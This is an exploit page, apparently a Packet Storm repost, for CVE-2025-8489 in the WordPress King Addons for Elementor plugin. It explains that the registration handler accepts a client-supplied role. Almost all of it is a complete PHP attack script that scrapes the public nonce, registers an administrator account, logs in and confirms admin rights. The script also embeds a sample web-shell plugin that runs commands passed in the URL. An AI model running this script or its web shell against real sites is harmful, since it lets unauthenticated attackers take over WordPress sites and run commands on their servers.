## https://sploitus.com/exploit?id=PACKETSTORM:216362
=============================================================================================================================================
| # Title : WordPress King Addons for Elementor 24.12.92 to 51.1.14 Unauthenticated Privilege Escalation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://wordpress.org/plugins/king-addons/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212728/ & CVE-2025-8489
[+] Summary : The vulnerability is in the handle_register_ajax() function of the King Addons plugin.
The function accepts the client-supplied user_role parameter during registration without any authorization check or role validation, so an unauthenticated attacker can register an account with any role, including administrator.
[+] Attack Vector :
Unauthenticated Registration: Attackers can register new users without authentication through the king_addons_user_register admin-ajax.php action
Role Manipulation: The user_role parameter can be set to "administrator"
Nonce Requirement: The request must carry a valid registration nonce; the widget prints it for any visitor inside the king_addons_login_register_vars JavaScript object on every page that renders the "Login Register Form" widget, so the nonce is not an access control
[+] POC :
php poc.php https://vulnerable-site.com /register-page/ \
--username indoushka \
--password P@ssw0rd123! \
--email indoushka4ever@gmail.com
<?php
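/**
 * PoC for CVE-2025-8489: the King Addons registration AJAX handler honours a
 * client-supplied user_role, so a visitor who has the (publicly exposed)
 * registration nonce can register an administrator account.
 *
 * Flow: harvest nonce from the widget page -> POST registration with
 * user_role=administrator -> log in through wp-login.php and confirm the
 * session really has administrator capabilities before reporting success.
 */
class WordPressKingAddonsExploit {
    /** Connect / total timeout in seconds so an unresponsive target cannot hang the run. */
    const HTTP_TIMEOUT = 30;
    /** Browser-like User-Agent sent on every request. */
    const USER_AGENT = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';

    /** Base URL of the target WordPress site, stored without a trailing slash. */
    private $targetUrl;
    private $username;
    private $password;
    private $email;
    /** Path (relative to targetUrl) of a page that renders the "Login Register Form" widget. */
    private $noncePage;
    /** Kept for interface compatibility; cookies are tracked by curl's in-memory engine instead. */
    private $cookieJar = [];

    /**
     * @param string $targetUrl Base URL of the WordPress site, e.g. https://example.com
     * @param string $noncePage Path of the page carrying the widget, e.g. /register-page/
     * @param string $username  Account name to register
     * @param string $password  Password for the new account
     * @param string $email     E-mail address for the new account
     */
    public function __construct($targetUrl, $noncePage, $username, $password, $email) {
        $this->targetUrl = rtrim($targetUrl, '/');
        $this->noncePage = $noncePage;
        $this->username  = $username;
        $this->password  = $password;
        $this->email     = $email;
    }

    /**
     * Run the full chain.
     *
     * @return array|false ['username', 'password', 'cookie'] on success, false when any step fails.
     */
    public function exploit() {
        echo "[*] Starting exploit for CVE-2025-8489\n";

        // Step 1: the registration nonce is embedded in the widget page's JavaScript.
        echo "[*] Searching for nonce on page: {$this->noncePage}\n";
        $nonce = $this->findNonce();
        if ($nonce === null) {
            echo "[-] Failed to find nonce\n";
            return false;
        }
        echo "[+] Found nonce: $nonce\n";

        // Step 2: register with user_role forced to "administrator".
        echo "[*] Creating administrator account\n";
        if (!$this->createAdminUser($nonce)) {
            echo "[-] Failed to create administrator account\n";
            return false;
        }
        echo "[+] Administrator account created\n";
        echo "[*] Username: {$this->username}\n";
        echo "[*] Password: {$this->password}\n";

        // Step 3: log in and verify the session actually carries administrator capabilities
        // (a "user already exists" fallback in step 2 may have reused a non-admin account).
        echo "[*] Logging in as administrator\n";
        $adminCookie = $this->wordpressLogin();
        if ($adminCookie === false) {
            echo "[-] Failed to login as administrator\n";
            return false;
        }
        echo "[+] Successfully logged in\n";

        return [
            'username' => $this->username,
            'password' => $this->password,
            'cookie'   => $adminCookie,
        ];
    }

    /**
     * Fetch the widget page and pull register_nonce out of the
     * king_addons_login_register_vars JavaScript object.
     *
     * @return string|null The nonce, or null when the page or the value is missing.
     */
    private function findNonce() {
        $url  = $this->targetUrl . '/' . ltrim($this->noncePage, '/');
        $html = $this->httpGet($url);
        if ($html === false || $html === '') {
            return null;
        }
        // Capture the object literal up to the first ';'. A ';' inside one of its string
        // values would truncate the match; not observed on the pages this was run against.
        if (!preg_match('/king_addons_login_register_vars\s*=\s*({[^;]+})/', $html, $m)) {
            return null;
        }
        $data = json_decode(str_replace('\/', '/', $m[1]), true);
        if (!is_array($data) || empty($data['register_nonce'])) {
            return null;
        }
        return $data['register_nonce'];
    }

    /**
     * POST the registration to admin-ajax.php with user_role=administrator.
     *
     * Returns true on a success response, and also when the handler reports that the
     * username already exists (the login step then decides whether that account is usable).
     *
     * @param string $nonce Registration nonce from findNonce().
     * @return bool
     */
    private function createAdminUser($nonce) {
        $ajaxUrl  = $this->targetUrl . '/wp-admin/admin-ajax.php';
        $postData = [
            'action'           => 'king_addons_user_register',
            'nonce'            => $nonce,
            'username'         => $this->username,
            'email'            => $this->email,
            'password'         => $this->password,
            'confirm_password' => $this->password,
            'user_role'        => 'administrator', // the unvalidated parameter behind CVE-2025-8489
            'terms_required'   => 'no',
        ];

        $response = $this->httpPost($ajaxUrl, $postData);
        if ($response === false) {
            return false;
        }
        $json = json_decode($response, true);
        if (!is_array($json) || !isset($json['success'])) {
            return false;
        }
        if ($json['success'] === true) {
            return true;
        }

        // Duplicate-user error: an earlier run (or someone else) already took this name.
        // Fall through to login; wordpressLogin() verifies the role instead of trusting this.
        $errorMsg = isset($json['data']['message']) ? (string) $json['data']['message'] : '';
        if (preg_match('/(already exists|username.*taken|user.*exists)/i', $errorMsg)) {
            echo "[!] User already exists, attempting to use existing account\n";
            return true;
        }
        return false;
    }

    /**
     * Log in through wp-login.php and confirm the session belongs to an administrator.
     *
     * Cookies live in curl's in-memory engine (CURLOPT_COOKIEFILE '') rather than a
     * cookie.txt in the working directory, so no session material for the target is
     * left on disk after the run.
     *
     * @return string|false Cookie header value ("name=value; ...") or false.
     */
    private function wordpressLogin() {
        $loginUrl = $this->targetUrl . '/wp-login.php';
        $ch = $this->newHandle($loginUrl);
        curl_setopt($ch, CURLOPT_COOKIEFILE, ''); // enable the cookie engine, memory only

        // wp-login.php rejects a POST that carries testcookie=1 when wordpress_test_cookie
        // is absent ("Cookies are blocked"), so fetch the form first, as a browser would,
        // to pick that cookie up on this handle.
        curl_exec($ch);

        $postData = [
            'log'         => $this->username,
            'pwd'         => $this->password,
            'wp-submit'   => 'Log In',
            'redirect_to' => $this->targetUrl . '/wp-admin/',
            'testcookie'  => '1',
        ];
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($postData));
        curl_setopt($ch, CURLOPT_HTTPHEADER, [
            'Content-Type: application/x-www-form-urlencoded',
            'Referer: ' . $loginUrl,
        ]);
        $response   = curl_exec($ch);
        $httpCode   = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        $cookieList = curl_getinfo($ch, CURLINFO_COOKIELIST);
        curl_close($ch);

        if ($response === false || ($httpCode !== 200 && $httpCode !== 302)) {
            return false;
        }
        // Values are taken verbatim from curl's cookie list; the original parse_str()
        // approach URL-decoded them and would have re-sent a different cookie value.
        $cookieStr = self::cookieHeaderFromList(is_array($cookieList) ? $cookieList : []);
        if ($cookieStr === '') {
            return false;
        }

        // Logged-in check: the admin bar is rendered for any authenticated user.
        $adminPage = $this->httpGet($this->targetUrl . '/wp-admin/', $cookieStr);
        if ($adminPage === false || strpos($adminPage, 'wp-admin-bar') === false) {
            return false;
        }
        // Privilege check: users.php requires the list_users capability and answers 403
        // otherwise, so a subscriber-level session (e.g. a reused pre-existing account)
        // cannot be misreported as an administrator.
        if ($this->httpGet($this->targetUrl . '/wp-admin/users.php', $cookieStr) === false) {
            echo "[!] Logged in, but the account does not have administrator capabilities\n";
            return false;
        }
        return $cookieStr;
    }

    /**
     * Turn CURLINFO_COOKIELIST lines (Netscape format, tab separated:
     * domain, flag, path, secure, expiry, name, value; HttpOnly entries carry a
     * "#HttpOnly_" domain prefix) into a Cookie header value. Malformed lines are skipped.
     *
     * @param string[] $cookieList
     * @return string "name=value; " per cookie, empty when there are none.
     */
    private static function cookieHeaderFromList(array $cookieList) {
        $pairs = [];
        foreach ($cookieList as $line) {
            $fields = explode("\t", $line);
            if (count($fields) < 7) {
                continue;
            }
            $pairs[$fields[5]] = $fields[6];
        }
        $header = '';
        foreach ($pairs as $name => $value) {
            $header .= "$name=$value; ";
        }
        return $header;
    }

    /**
     * Placeholder only: prints a warning and returns false. It does not upload anything;
     * the $pluginContent below is never sent and is kept purely as an illustration.
     *
     * @param string $adminCookie Unused.
     * @return false
     */
    public function uploadMaliciousPlugin($adminCookie) {
        echo "[*] Warning: This function demonstrates file upload capability\n";
        echo "[*] For educational purposes only!\n";
        $pluginContent = '<?php
/**
* Plugin Name: Malicious Demo
* Description: Proof of Concept - DO NOT USE IN PRODUCTION
*/
if (isset($_GET["cmd"]) && current_user_can("administrator")) {
system($_GET["cmd"]);
}
?>';
        // Note: Actual plugin upload requires more complex implementation
        // involving ZIP creation and WordPress upload mechanisms
        return false;
    }

    /**
     * Build a curl handle with the options every request shares.
     * TLS verification is left at curl's default (on); do not weaken it for convenience.
     *
     * @param string $url
     * @return resource|\CurlHandle
     */
    private function newHandle($url) {
        $ch = curl_init($url);
        curl_setopt_array($ch, [
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_USERAGENT      => self::USER_AGENT,
            CURLOPT_CONNECTTIMEOUT => self::HTTP_TIMEOUT,
            CURLOPT_TIMEOUT        => self::HTTP_TIMEOUT,
        ]);
        return $ch;
    }

    /**
     * HTTP GET.
     *
     * @param string $url
     * @param string $cookie Optional Cookie header value.
     * @return string|false Body on HTTP 200, false on transport error or any other status.
     */
    private function httpGet($url, $cookie = '') {
        $ch = $this->newHandle($url);
        if ($cookie !== '') {
            curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        }
        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ($body !== false && $code === 200) ? $body : false;
    }

    /**
     * HTTP POST (application/x-www-form-urlencoded).
     *
     * @param string $url
     * @param array  $data   Form fields.
     * @param string $cookie Optional Cookie header value.
     * @return string|false Body on HTTP 200, false on transport error or any other status.
     */
    private function httpPost($url, $data, $cookie = '') {
        $ch = $this->newHandle($url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
        if ($cookie !== '') {
            curl_setopt($ch, CURLOPT_COOKIE, $cookie);
        }
        $body = curl_exec($ch);
        $code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        curl_close($ch);
        return ($body !== false && $code === 200) ? $body : false;
    }
}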
/**
* واجهة سطر الأوامر (CLI)
*/
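/**
 * CLI entry point: php exploit.php [target_url] [nonce_page_path] [--username U] [--password P] [--email E]
 * Exit status is 1 on usage error, bad target URL or a failed run, so the script can be chained.
 */
if (php_sapi_name() === 'cli') {
    echo "=== WordPress King Addons Exploit (CVE-2025-8489) ===\n\n";
    if ($argc < 3) {
        echo "Usage: php " . basename(__FILE__) . " [target_url] [nonce_page_path]\n";
        echo "Example: php exploit.php https://example.com /page-with-form/\n\n";
        echo "Optional parameters:\n";
        echo " --username [username] (default: random)\n";
        echo " --password [password] (default: random)\n";
        echo " --email [email] (default: random)\n";
        exit(1);
    }
    $targetUrl = $argv[1];
    $noncePage = $argv[2];

    // Refuse anything that is not an http(s) URL before a single request is sent.
    $scheme = strtolower((string) parse_url($targetUrl, PHP_URL_SCHEME));
    if (!in_array($scheme, ['http', 'https'], true)) {
        echo "[-] target_url must start with http:// or https://\n";
        exit(1);
    }

    // Defaults come from the CSPRNG, independently of each other. The previous
    // md5(time()) scheme derived all three from one clock value, so the default
    // password was a substring-sibling of the username and guessable from it.
    $username = 'admin_' . bin2hex(random_bytes(4));
    $password = bin2hex(random_bytes(8));
    $email    = bin2hex(random_bytes(4)) . '@example.com';

    // Optional overrides; a flag without a value or an unknown flag is reported, not ignored silently.
    for ($i = 3; $i < $argc; $i++) {
        $flag     = $argv[$i];
        $hasValue = isset($argv[$i + 1]);
        if ($flag === '--username' && $hasValue) {
            $username = $argv[++$i];
        } elseif ($flag === '--password' && $hasValue) {
            $password = $argv[++$i];
        } elseif ($flag === '--email' && $hasValue) {
            $email = $argv[++$i];
        } else {
            echo "[!] Ignoring unrecognised or incomplete argument: {$flag}\n";
        }
    }

    $exploit = new WordPressKingAddonsExploit($targetUrl, $noncePage, $username, $password, $email);
    $result  = $exploit->exploit();
    if ($result) {
        echo "\n[+] Exploit successful!\n";
        echo "[+] Administrator credentials:\n";
        echo " URL: " . $targetUrl . "/wp-admin/\n";
        echo " Username: " . $result['username'] . "\n";
        echo " Password: " . $result['password'] . "\n";
        echo "\n[!] Important: Remove the created user after testing!\n";
    } else {
        echo "\n[-] Exploit failed\n";
        exit(1);
    }
} else {
    echo "This script is intended for command line use.\n";
}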
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================